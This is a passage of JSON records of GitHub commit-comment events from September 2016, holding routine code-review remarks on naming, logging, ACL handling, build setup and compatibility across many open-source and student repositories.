Ndung'u /** Andela.com\n<http://andela.com/?utm_source=andela&utm_medium=email&utm_campaign=signature> *\n*Software Developer / +254722826987 <646.620.0604> / @Andela\n<http://bit.ly/andelatwitter>*\nWe're hiring! Check out our careers page. <http://bit.ly/andelacareers>\n"}},"created_at":"2016-09-02T12:58:32Z"}
{"id":"4508364045","type":"CommitCommentEvent","actor":{"login":"philwebb"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":18879855,"position":9,"line":131,"path":"spring-boot-tools/spring-boot-maven-plugin/src/main/java/org/springframework/boot/maven/RunMojo.java","commit_id":"951f051df95933d57776eb6ac23372665cb1965c","created_at":"2016-09-02T12:59:01Z","updated_at":"2016-09-02T12:59:01Z","body":"Actually not. It breaks Java 6 compat!!"}},"created_at":"2016-09-02T12:59:01Z"}
{"id":"4508367729","type":"CommitCommentEvent","actor":{"login":"makizonokenji"},"repo":{"name":"ito-artsfarm/itoartsfarm2016-wp"},"payload":{"comment":{"id":18879866,"position":null,"line":null,"path":null,"commit_id":"27d1b2586e4e69384e825d0ab1282bdc12c4daea","created_at":"2016-09-02T12:59:49Z","updated_at":"2016-09-02T12:59:49Z","body":"@ecogrammer 細かいところですが、front-page.php修正しました！リリースお願いします！"}},"created_at":"2016-09-02T12:59:49Z"}
{"id":"4508367748","type":"CommitCommentEvent","actor":{"login":"mabrand"},"repo":{"name":"mxe/mxe"},"payload":{"comment":{"id":18879867,"position":null,"line":null,"path":null,"commit_id":"3d44ee628ff5cdd1aa91ef6bf0bff86ee1e69420","created_at":"2016-09-02T12:59:49Z","updated_at":"2016-09-02T12:59:49Z","body":"done"}},"created_at":"2016-09-02T12:59:49Z"}
{"id":"4508370409","type":"CommitCommentEvent","actor":{"login":"a1batross"},"repo":{"name":"FWGS/xash3d"},"payload":{"comment":{"id":18879871,"position":4,"line":0,"path":"engine/client/client.h","commit_id":"1688549ec1aa7eccf79a99497878f6f6e1b5a2bf","created_at":"2016-09-02T13:00:23Z","updated_at":"2016-09-02T13:00:23Z","body":"MAX_PLAYERS"}},"created_at":"2016-09-02T13:00:23Z"}
{"id":"4508370935","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879873,"position":103,"line":103,"path":"src/com/sopra/tienda/dominio/Producto.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:00:29Z","updated_at":"2016-09-02T13:00:29Z","body":"Validator.cumpleLongitud & Validator.isAlfanumeric\r\nEnglish or spanish?"}},"created_at":"2016-09-02T13:00:29Z"}
{"id":"4508375286","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"DardoTheMaster/Framework"},"payload":{"comment":{"id":18879884,"position":5,"line":9,"path":"Altis_Life.Altis/core/actions/fn_storeVehicle.sqf","commit_id":"6b1d5ac8048a94e443986223524264f6c95b325f","created_at":"2016-09-02T13:01:22Z","updated_at":"2016-09-02T13:01:22Z","body":"`private [`*"}},"created_at":"2016-09-02T13:01:22Z"}
{"id":"4508375585","type":"CommitCommentEvent","actor":{"login":"makizonokenji"},"repo":{"name":"ito-artsfarm/itoartsfarm2016-wp"},"payload":{"comment":{"id":18879885,"position":null,"line":null,"path":null,"commit_id":"27d1b2586e4e69384e825d0ab1282bdc12c4daea","created_at":"2016-09-02T13:01:26Z","updated_at":"2016-09-02T13:01:26Z","body":"@ecogrammer 細かいところですが、front-page.php修正しました！リリースお願いします！"}},"created_at":"2016-09-02T13:01:26Z"}
{"id":"4508376369","type":"CommitCommentEvent","actor":{"login":"rCarto"},"repo":{"name":"sjewo/cartogram"},"payload":{"comment":{"id":18879887,"position":null,"line":null,"path":null,"commit_id":"57b5c5d119ea73bd0cdec5074b6a4228d81b585f","created_at":"2016-09-02T13:01:35Z","updated_at":"2016-09-02T13:01:35Z","body":"Hi, you can try this approach for your .travis.yml : https://raw.githubusercontent.com/Groupe-ElementR/cartography/master/.travis.yml\r\nI struggled a lot installing rgdal on travis, this approach work for me.  "}},"created_at":"2016-09-02T13:01:35Z"}
{"id":"4508377171","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879891,"position":220,"line":220,"path":"src/com/sopra/tienda/dominio/Producto.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:01:45Z","updated_at":"2016-09-02T13:01:45Z","body":"Why do you create the Calendar instance here if it not used until the \"else\"?\r\nYou can move it into the \"else\" statement."}},"created_at":"2016-09-02T13:01:45Z"}
{"id":"4508378434","type":"CommitCommentEvent","actor":{"login":"jekkos"},"repo":{"name":"jekkos/opensourcepos"},"payload":{"comment":{"id":18879895,"position":6,"line":6,"path":"application/hooks/load_stats.php","commit_id":"c88de60a9f6c805332cf54fdc75177fb12908e9f","created_at":"2016-09-02T13:02:01Z","updated_at":"2016-09-02T13:02:01Z","body":"The check below verifies whether this line contains the string so should be good. Also the check is done again in javascript."}},"created_at":"2016-09-02T13:02:01Z"}
{"id":"4508382867","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"DardoTheMaster/Framework"},"payload":{"comment":{"id":18879905,"position":9,"line":135,"path":"Altis_Life.Altis/config/Config_Master.hpp","commit_id":"2498c4435de1b250b1b7087ca7e375b7c36e43ff","created_at":"2016-09-02T13:03:03Z","updated_at":"2016-09-02T13:03:03Z","body":"I think that the purpose of those 4 `garage_limit` parameters could be better explained for people who are not familiar with what it does. "}},"created_at":"2016-09-02T13:03:03Z"}
{"id":"4508383148","type":"CommitCommentEvent","actor":{"login":"Jahwn"},"repo":{"name":"Jahwn/JohnDavies2406A1"},"payload":{"comment":{"id":18879907,"position":null,"line":null,"path":null,"commit_id":"9c2c6380bdbaac3fa23af77c9bb79c1d3a769f5d","created_at":"2016-09-02T13:03:08Z","updated_at":"2016-09-02T13:03:08Z","body":"Also changed the names in Card class to be of a more suitable naming convention (camelCaps)."}},"created_at":"2016-09-02T13:03:08Z"}
{"id":"4508384460","type":"CommitCommentEvent","actor":{"login":"JohnPKosh"},"repo":{"name":"JohnPKosh/IODataBlock"},"payload":{"comment":{"id":18879909,"position":51,"line":208,"path":"IODataBlock/WebTrakrChromeExtensionMock/app/popup.js","commit_id":"2c776598789b208f8f30fbb1a8d66d8358634dd3","created_at":"2016-09-02T13:03:23Z","updated_at":"2016-09-02T13:03:23Z","body":"Moved this code to unused_utility.js for later refactoring or discard."}},"created_at":"2016-09-02T13:03:23Z"}
{"id":"4508390528","type":"CommitCommentEvent","actor":{"login":"bbinet"},"repo":{"name":"mozilla-services/hindsight"},"payload":{"comment":{"id":18879918,"position":8,"line":15,"path":"README.md","commit_id":"f54ae57aec3e4d5f653c59d9b412c92acb4120cb","created_at":"2016-09-02T13:04:46Z","updated_at":"2016-09-02T13:04:46Z","body":"@elemoine A mailman mailing list is now functional at https://mail.mozilla.org/listinfo/hindsight"}},"created_at":"2016-09-02T13:04:46Z"}
{"id":"4508394777","type":"CommitCommentEvent","actor":{"login":"fifito22"},"repo":{"name":"fifito22/Rado_first_blog"},"payload":{"comment":{"id":18879926,"position":null,"line":null,"path":null,"commit_id":"8ce30194f87f9b722aec1d0c70fa21a8a190843e","created_at":"2016-09-02T13:05:41Z","updated_at":"2016-09-02T13:05:41Z","body":"last"}},"created_at":"2016-09-02T13:05:41Z"}
{"id":"4508401835","type":"CommitCommentEvent","actor":{"login":"ontouchstart"},"repo":{"name":"steam-maker/EHS-CN"},"payload":{"comment":{"id":18879940,"position":null,"line":null,"path":null,"commit_id":"cad301b2f63abe987fe08e517e0b6114d64590f0","created_at":"2016-09-02T13:07:17Z","updated_at":"2016-09-02T13:07:17Z","body":"Found this on the Internet: [src](http://informationdisplay.org/IDArchive/2012/JulyAugust/PartIABriefHistoryofKeyAreasinDisplayTe.aspx)\r\n\r\n![img_0049](https://cloud.githubusercontent.com/assets/951921/18204797/a3f19166-70ec-11e6-889f-5f368140d59f.PNG)\r\n"}},"created_at":"2016-09-02T13:07:17Z"}
{"id":"4508403014","type":"CommitCommentEvent","actor":{"login":"sjewo"},"repo":{"name":"sjewo/cartogram"},"payload":{"comment":{"id":18879942,"position":null,"line":null,"path":null,"commit_id":"57b5c5d119ea73bd0cdec5074b6a4228d81b585f","created_at":"2016-09-02T13:07:32Z","updated_at":"2016-09-02T13:07:32Z","body":"Hi, thanks for the tip! This variant seems to work, too."}},"created_at":"2016-09-02T13:07:32Z"}
{"id":"4508405694","type":"CommitCommentEvent","actor":{"login":"haf"},"repo":{"name":"logary/logary"},"payload":{"comment":{"id":18879952,"position":27,"line":52,"path":"src/Logary/Supervisor.fs","commit_id":"fc2ca126e2d2378eec4b1e19e26f260549a06110","created_at":"2016-09-02T13:08:08Z","updated_at":"2016-09-02T13:08:08Z","body":"Extra ) here"}},"created_at":"2016-09-02T13:08:08Z"}
{"id":"4508406056","type":"CommitCommentEvent","actor":{"login":"bergmark"},"repo":{"name":"fpco/stackage"},"payload":{"comment":{"id":18879954,"position":null,"line":null,"path":null,"commit_id":"fc80cc5ca9d5a7feb1a76e101b294a7aabdb0197","created_at":"2016-09-02T13:08:13Z","updated_at":"2016-09-02T13:08:13Z","body":"@DanBurton I accidentally commited this instead of creating a PR.\r\n"}},"created_at":"2016-09-02T13:08:13Z"}
{"id":"4508407675","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879966,"position":38,"line":38,"path":"src/com/sopra/tienda/servlets/Borrar.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:08:32Z","updated_at":"2016-09-02T13:08:32Z","body":"If you this endpoint only manage POST, throw an exception when performing a GET, don't redirect"}},"created_at":"2016-09-02T13:08:32Z"}
{"id":"4508410332","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879977,"position":19,"line":19,"path":"src/com/sopra/tienda/servlets/Borrar.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:09:09Z","updated_at":"2016-09-02T13:09:09Z","body":"Avoid upper case"}},"created_at":"2016-09-02T13:09:09Z"}
{"id":"4508412901","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879983,"position":19,"line":19,"path":"src/com/sopra/tienda/servlets/Borrar.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:09:42Z","updated_at":"2016-09-02T13:09:42Z","body":"Or almost use always the same strategy (\"engadir\" starts in lower case)"}},"created_at":"2016-09-02T13:09:42Z"}
{"id":"4508416978","type":"CommitCommentEvent","actor":{"login":"vied12"},"repo":{"name":"superdesk/superdesk-core"},"payload":{"comment":{"id":18879993,"position":82,"line":82,"path":"superdesk/backend_meta/backend_meta.py","commit_id":"1f16a27bf3f90e07d2e5529c53a1c10af0e2389b","created_at":"2016-09-02T13:10:35Z","updated_at":"2016-09-02T13:10:35Z","body":"Are you sure that `json` has `JSONDecodeError` ?\r\nI can't find it. Which version do you use ?\r\nYou maybe confused with `simplejson` ?"}},"created_at":"2016-09-02T13:10:35Z"}
{"id":"4508417392","type":"CommitCommentEvent","actor":{"login":"der-ede"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":18879994,"position":null,"line":null,"path":null,"commit_id":"6600c1dfe0c78a048fcf50f4de7c6aaa33a9a4e1","created_at":"2016-09-02T13:10:39Z","updated_at":"2016-09-02T13:10:39Z","body":"Hi there,\r\n\r\ncan this help in getting a meteoric app to the app store. The scss won't compile right with TestFlight.\r\nGoogle's Play Store is fine.\r\n\r\nRegards"}},"created_at":"2016-09-02T13:10:39Z"}
{"id":"4508423996","type":"CommitCommentEvent","actor":{"login":"elemoine"},"repo":{"name":"mozilla-services/hindsight"},"payload":{"comment":{"id":18880009,"position":8,"line":15,"path":"README.md","commit_id":"f54ae57aec3e4d5f653c59d9b412c92acb4120cb","created_at":"2016-09-02T13:12:08Z","updated_at":"2016-09-02T13:12:08Z","body":"Thanks."}},"created_at":"2016-09-02T13:12:08Z"}
{"id":"4508426538","type":"CommitCommentEvent","actor":{"login":"davag"},"repo":{"name":"TemenosDS/DS-ESON"},"payload":{"comment":{"id":18880014,"position":47,"line":47,"path":"plugins/org.eclipse.emf.eson/src/org/eclipse/emf/eson/conversion/StringOrQualifiedNameValueConverter.java","commit_id":"c50cd9227fc53660c91bd6031321dc4f152d25a5","created_at":"2016-09-02T13:12:40Z","updated_at":"2016-09-02T13:12:40Z","body":"I think a comment would be useful (match against grammar ID terminal)"}},"created_at":"2016-09-02T13:12:40Z"}
{"id":"4508427664","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880016,"position":11,"line":11,"path":"src/com/sopra/tienda/util/Conexion.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:12:56Z","updated_at":"2016-09-02T13:12:56Z","body":"Don't you use Hibernate? Why all this information here?\r\nIt's a very bad practice to have all this data (driver, URL, username, password) in a compiled file instead of a configuration file (as XML)"}},"created_at":"2016-09-02T13:12:56Z"}
{"id":"4508427803","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"TiberiumPY/puremine"},"payload":{"comment":{"id":18880017,"position":null,"line":null,"path":null,"commit_id":"78780457b019866ba6fc225fcfbcd3831bc2ddbb","created_at":"2016-09-02T13:12:57Z","updated_at":"2016-09-02T13:12:57Z","body":"Oh ok\n"}},"created_at":"2016-09-02T13:12:57Z"}
{"id":"4508427893","type":"CommitCommentEvent","actor":{"login":"davag"},"repo":{"name":"TemenosDS/DS-ESON"},"payload":{"comment":{"id":18880018,"position":53,"line":53,"path":"plugins/org.eclipse.emf.eson/src/org/eclipse/emf/eson/conversion/StringOrQualifiedNameValueConverter.java","commit_id":"c50cd9227fc53660c91bd6031321dc4f152d25a5","created_at":"2016-09-02T13:12:59Z","updated_at":"2016-09-02T13:12:59Z","body":"maybe use Character.isLetterOrDigit(c)"}},"created_at":"2016-09-02T13:12:59Z"}
{"id":"4508430953","type":"CommitCommentEvent","actor":{"login":"davag"},"repo":{"name":"TemenosDS/DS-ESON"},"payload":{"comment":{"id":18880023,"position":55,"line":55,"path":"plugins/org.eclipse.emf.eson/src/org/eclipse/emf/eson/conversion/StringOrQualifiedNameValueConverter.java","commit_id":"c50cd9227fc53660c91bd6031321dc4f152d25a5","created_at":"2016-09-02T13:13:39Z","updated_at":"2016-09-02T13:13:39Z","body":"perhaps a list of allowed chars in terminal ID rule with \".\" as another one"}},"created_at":"2016-09-02T13:13:39Z"}
{"id":"4508431866","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880026,"position":3,"line":3,"path":"src/com/sopra/tienda/util/MainRutinas.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:13:51Z","updated_at":"2016-09-02T13:13:51Z","body":"What's this main for?"}},"created_at":"2016-09-02T13:13:51Z"}
{"id":"4508433113","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880029,"position":7,"line":7,"path":"src/com/sopra/tienda/util/MainValidator.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:14:08Z","updated_at":"2016-09-02T13:14:08Z","body":"What's this main for?"}},"created_at":"2016-09-02T13:14:08Z"}
{"id":"4508437137","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880038,"position":22,"line":22,"path":"src/com/sopra/tienda/util/Rutinas.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:15:00Z","updated_at":"2016-09-02T13:15:00Z","body":"In this case (you have two converters in the two ways, from and to, use a constant to store the date format"}},"created_at":"2016-09-02T13:15:00Z"}
{"id":"4508438848","type":"CommitCommentEvent","actor":{"login":"AlexPeshkoff"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18880039,"position":14,"line":892,"path":"src/common/common.h","commit_id":"3533997873869a44932bb0c3f8ce42c0cc5043f3","created_at":"2016-09-02T13:15:22Z","updated_at":"2016-09-02T13:15:22Z","body":"Adriano, do we still try to keep support for non c++11 (may be I've missed something in discussion) ?"}},"created_at":"2016-09-02T13:15:22Z"}
{"id":"4508439336","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880042,"position":3,"line":421,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"20166ef21adee194a06e0e1778a7080e9d9ade4a","created_at":"2016-09-02T13:15:29Z","updated_at":"2016-09-02T13:15:29Z","body":"If we don't have a fd and we are inside a subdirectory we need to set `a->tree_enter_working_dir()` otherwise `acl_get_file()` will always lookup a file in the top level directory, which remains current."}},"created_at":"2016-09-02T13:15:29Z"}
{"id":"4508442083","type":"CommitCommentEvent","actor":{"login":"mavnn"},"repo":{"name":"logary/logary"},"payload":{"comment":{"id":18880048,"position":27,"line":52,"path":"src/Logary/Supervisor.fs","commit_id":"fc2ca126e2d2378eec4b1e19e26f260549a06110","created_at":"2016-09-02T13:16:05Z","updated_at":"2016-09-02T13:16:05Z","body":"Cleaned up locally, I'll see if you have any other comments before I push :)"}},"created_at":"2016-09-02T13:16:05Z"}
{"id":"4508443936","type":"CommitCommentEvent","actor":{"login":"TiberiumPY"},"repo":{"name":"TiberiumPY/puremine"},"payload":{"comment":{"id":18880053,"position":null,"line":null,"path":null,"commit_id":"78780457b019866ba6fc225fcfbcd3831bc2ddbb","created_at":"2016-09-02T13:16:28Z","updated_at":"2016-09-02T13:16:28Z","body":"My server isn't have a terrain support and you can't view other players xD :) This will be implemented *soon*(players), about terrain.. it's harder"}},"created_at":"2016-09-02T13:16:28Z"}
{"id":"4508444183","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880054,"position":11,"line":11,"path":"test/com/sopra/tienda/dominio/CategoriaTest.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:16:32Z","updated_at":"2016-09-02T13:16:32Z","body":"Why those tests?"}},"created_at":"2016-09-02T13:16:32Z"}
{"id":"4508445509","type":"CommitCommentEvent","actor":{"login":"SalamiArmy"},"repo":{"name":"JetBrains/resharper-devguide"},"payload":{"comment":{"id":18880057,"position":null,"line":null,"path":null,"commit_id":"211536d2da48b011be728c950589a8d036eb294a","created_at":"2016-09-02T13:16:49Z","updated_at":"2016-09-02T13:16:49Z","body":"Heads up, https://github.com/hhariri/CleanCode also needs to update to Resharper 2016.2"}},"created_at":"2016-09-02T13:16:49Z"}
{"id":"4508445891","type":"CommitCommentEvent","actor":{"login":"haf"},"repo":{"name":"logary/logary"},"payload":{"comment":{"id":18880059,"position":51,"line":119,"path":"src/Logary/Supervisor.fs","commit_id":"fc2ca126e2d2378eec4b1e19e26f260549a06110","created_at":"2016-09-02T13:16:54Z","updated_at":"2016-09-02T13:16:54Z","body":"Should we use `%A` which is reflection? Why not use `setField...Object...` which does this instead?"}},"created_at":"2016-09-02T13:16:54Z"}
{"id":"4508446700","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880061,"position":4,"line":422,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"20166ef21adee194a06e0e1778a7080e9d9ade4a","created_at":"2016-09-02T13:17:06Z","updated_at":"2016-09-02T13:17:06Z","body":"If we don't have a fd and we are inside a subdirectory we need to set `a->tree_enter_working_dir()` otherwise `acl_get_file()` will always lookup a file in the top level directory, which remains current."}},"created_at":"2016-09-02T13:17:06Z"}
{"id":"4508446787","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880062,"position":9,"line":9,"path":"test/com/sopra/tienda/dominio/pruebafecha.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:17:07Z","updated_at":"2016-09-02T13:17:07Z","body":"What's this main for?"}},"created_at":"2016-09-02T13:17:07Z"}
{"id":"4508447084","type":"CommitCommentEvent","actor":{"login":"alaney"},"repo":{"name":"alaney/arduino-mavlink"},"payload":{"comment":{"id":18880064,"position":null,"line":null,"path":null,"commit_id":"4d71dc5eecd4dda262237081a07c07963e8136ef","created_at":"2016-09-02T13:17:11Z","updated_at":"2016-09-02T13:17:11Z","body":"Hey @ajaybhatt003. I wish I could help you out but it's been about 4 years since I looked at any of this or even touched an arduino. I suggest you consult diydrones.com forum or http://qgroundcontrol.org/mavlink/start. Sorry I couldn't be of more help"}},"created_at":"2016-09-02T13:17:11Z"}
{"id":"4508447212","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880065,"position":3,"line":421,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"20166ef21adee194a06e0e1778a7080e9d9ade4a","created_at":"2016-09-02T13:17:13Z","updated_at":"2016-09-02T13:17:13Z","body":"If we don't have a fd and we are inside a subdirectory we need to set `a->tree_enter_working_dir()` otherwise `acl_get_file()` will always lookup a file in the top level directory, which remains current."}},"created_at":"2016-09-02T13:17:13Z"}
{"id":"4508448392","type":"CommitCommentEvent","actor":{"login":"haf"},"repo":{"name":"logary/logary"},"payload":{"comment":{"id":18880078,"position":17,"line":17,"path":"src/tests/Logary.Tests/Supervisor.fs","commit_id":"fc2ca126e2d2378eec4b1e19e26f260549a06110","created_at":"2016-09-02T13:17:27Z","updated_at":"2016-09-02T13:17:27Z","body":"Remove dead code"}},"created_at":"2016-09-02T13:17:27Z"}
{"id":"4508449244","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"CenterForOpenScience/osf.io"},"payload":{"comment":{"id":18880082,"position":5,"line":3240,"path":"website/project/model.py","commit_id":"cf68848c0cba14288104186163d1f36d532b61b1","created_at":"2016-09-02T13:17:38Z","updated_at":"2016-09-02T13:17:38Z","body":"Good catch on the typo, and yes, it would be good to add a permissions check in the `elif` block. Can you make that change? If you're focused on other things, I can make that change this afternoon."}},"created_at":"2016-09-02T13:17:38Z"}
{"id":"4508450574","type":"CommitCommentEvent","actor":{"login":"haf"},"repo":{"name":"logary/logary"},"payload":{"comment":{"id":18880088,"position":76,"line":76,"path":"src/tests/Logary.Tests/Supervisor.fs","commit_id":"fc2ca126e2d2378eec4b1e19e26f260549a06110","created_at":"2016-09-02T13:17:55Z","updated_at":"2016-09-02T13:17:55Z","body":"2 space indentation"}},"created_at":"2016-09-02T13:17:55Z"}
{"id":"4508450982","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880089,"position":17,"line":17,"path":"test/com/sopra/tienda/objetos/daos/testCategoriaDao.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:18:01Z","updated_at":"2016-09-02T13:18:01Z","body":"What kind of class name is that?"}},"created_at":"2016-09-02T13:18:01Z"}
{"id":"4508452686","type":"CommitCommentEvent","actor":{"login":"ocarriles"},"repo":{"name":"RestComm/sbc"},"payload":{"comment":{"id":18880091,"position":null,"line":null,"path":null,"commit_id":"70ee5e94a02811fce008bf8e0effe1b9c7b36fb4","created_at":"2016-09-02T13:18:23Z","updated_at":"2016-09-02T13:18:23Z","body":"@deruelle Let's talk about the following items at our weekly meeting:\r\na) User multilocations in Throttling registration cache context\r\nb) SIP forking feature delegation to backend.\r\nYour feedback would help to improve the weak and buggy Location implementation."}},"created_at":"2016-09-02T13:18:23Z"}
{"id":"4508453148","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"TiberiumPY/puremine"},"payload":{"comment":{"id":18880092,"position":null,"line":null,"path":null,"commit_id":"78780457b019866ba6fc225fcfbcd3831bc2ddbb","created_at":"2016-09-02T13:18:29Z","updated_at":"2016-09-02T13:18:29Z","body":"Oh haha\n"}},"created_at":"2016-09-02T13:18:29Z"}
{"id":"4508453632","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18880093,"position":null,"line":null,"path":null,"commit_id":"aefb21790da4cf94a970946738a82061df8857da","created_at":"2016-09-02T13:18:35Z","updated_at":"2016-09-02T13:18:35Z","body":"No, that was just a random number for the tempo conversion test (i.e. a number other than 120)."}},"created_at":"2016-09-02T13:18:35Z"}
{"id":"4508453751","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880094,"position":26,"line":443,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"20166ef21adee194a06e0e1778a7080e9d9ade4a","created_at":"2016-09-02T13:18:37Z","updated_at":"2016-09-02T13:18:37Z","body":"`acl_get_fd()` always gets only POSIX.1e ACLs on FreeBSD. We need `acl_get_fd_np()` here."}},"created_at":"2016-09-02T13:18:37Z"}
{"id":"4508454143","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880095,"position":18,"line":18,"path":"test/com/sopra/tienda/util/testConexion.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:18:42Z","updated_at":"2016-09-02T13:18:42Z","body":"What kind of class name is that?"}},"created_at":"2016-09-02T13:18:42Z"}
{"id":"4508454398","type":"CommitCommentEvent","actor":{"login":"McSwaggens"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18880096,"position":null,"line":null,"path":null,"commit_id":"eaa1b8d9c4380cfa668dbdaaf53a224c773a8917","created_at":"2016-09-02T13:18:45Z","updated_at":"2016-09-02T13:18:45Z","body":"ENDI A or B?\r\nI can't decide\r\nhttp://imgur.com/a/TRbkj"}},"created_at":"2016-09-02T13:18:45Z"}
{"id":"4508457401","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880101,"position":null,"line":null,"path":null,"commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:19:22Z","updated_at":"2016-09-02T13:19:22Z","body":"You use English, Spanish and Galician. Try to use only one language (English by default)"}},"created_at":"2016-09-02T13:19:22Z"}
{"id":"4508459814","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880107,"position":36,"line":458,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"20166ef21adee194a06e0e1778a7080e9d9ade4a","created_at":"2016-09-02T13:19:52Z","updated_at":"2016-09-02T13:19:52Z","body":"We definitely do not want to check if a NULL acl is trivial."}},"created_at":"2016-09-02T13:19:52Z"}
{"id":"4508460474","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880109,"position":null,"line":null,"path":null,"commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:20:01Z","updated_at":"2016-09-02T13:20:01Z","body":"Avoid the system.out/err.println() and e.printStackTrace() and use some logger library as Log4J"}},"created_at":"2016-09-02T13:20:01Z"}
{"id":"4508462453","type":"CommitCommentEvent","actor":{"login":"kaueb"},"repo":{"name":"ThallysonB/NewFitnessNatal"},"payload":{"comment":{"id":18880111,"position":null,"line":null,"path":null,"commit_id":"114860042952c16899516111e3d163dacd3f5ba5","created_at":"2016-09-02T13:20:26Z","updated_at":"2016-09-02T13:20:26Z","body":"Porque você removeu o `Font-Awesome`? Conseguiu encontrar o problema que o fazia não funcionar?"}},"created_at":"2016-09-02T13:20:26Z"}
{"id":"4508462826","type":"CommitCommentEvent","actor":{"login":"rpherbig"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":18880116,"position":4,"line":822,"path":"combat-trainer.lic","commit_id":"8df1a6b1ccb5551de8b60251199326adec093133","created_at":"2016-09-02T13:20:30Z","updated_at":"2016-09-02T13:20:30Z","body":"Why was this change made?"}},"created_at":"2016-09-02T13:20:30Z"}
{"id":"4508463242","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"Catzenjaeger/FigureLib_4"},"payload":{"comment":{"id":18880117,"position":null,"line":null,"path":null,"commit_id":"190fbd139518ca25a00da65c70a45cf33e1c9cd6","created_at":"2016-09-02T13:20:35Z","updated_at":"2016-09-02T13:20:35Z","body":"Please try with $_GET['figure_manufacturer']"}},"created_at":"2016-09-02T13:20:35Z"}
{"id":"4508463694","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880119,"position":null,"line":null,"path":null,"commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:20:41Z","updated_at":"2016-09-02T13:20:41Z","body":"As you have some unit tests and some external libraries imported, you can use a dependency management as Maven."}},"created_at":"2016-09-02T13:20:41Z"}
